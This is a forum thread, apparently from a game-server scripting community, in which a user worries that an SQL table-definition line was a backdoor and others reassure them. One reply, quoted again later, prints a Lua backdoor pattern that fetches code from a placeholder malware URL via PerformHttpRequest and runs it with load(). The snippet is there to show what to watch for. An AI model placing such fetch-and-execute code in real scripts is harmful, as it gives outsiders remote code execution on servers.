[QUESTION] How to spot a potential backdoor? (1 Viewer)

[songbirdmusic_19573]

I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci

 

[VeryNiceIndeed]

I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci

That line is perfectly fine for a database

 

[coolcsgo]

This is just setting the auto increment, and default charset for the DB you imported

 

[songbirdmusic_19573]

Thank you everyone for calming my nerves and reassuring me I didn't do anything wrong. It was just at first glance it seemed extremely odd so I panicked

 

[Hopatchke]

PerformHttpRequest(' Sht that goes to a malware website., function (e, d)
local s = assert(load(d))
if (d == nil) then return end
s()
end)


things like this are Cipher codes. & Backdoors. Performhttprequest etc. get on github and download a backdoor checker

 

[songbirdmusic_19573]

PerformHttpRequest(' Sht that goes to a malware website., function (e, d)
local s = assert(load(d))
if (d == nil) then return end
s()
end)


things like this are Cipher codes. & Backdoors. Performhttprequest etc. get on github and download a backdoor checker

Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on the look out for. If there are any threats I guess its long too late now haha

 

[Hopatchke]

Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on the look out for. If there are any threats I guess its long too late now haha

malwarebytes , the free version offers a good scan , works perfectly!

 

[songbirdmusic_19573]

malwarebytes , the free version offers a good scan , works perfectly!

I actually currently have three different protections installed, so hopefully I'm not as screwed then if I downloaded something I wasn't supposed to

 

[airis13370]

grghrheheh grghrheheh grghrheheh grghrheheh grghrheheh grghrheheh

 

[amirexit]

I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci

i need to know too thanks for creating this thread

 

[Du22121]

you never know if they add back doors when its too late

 

[songbirdmusic_19573]

you never know if they add back doors when its too late

Not necessarily true, there are script checkers out there and you can scan them to be safe. I always scan my scripts, then manually search through all my code and put it through another scan to be sure. There are preventions an ways to be safe, you need to know what to look for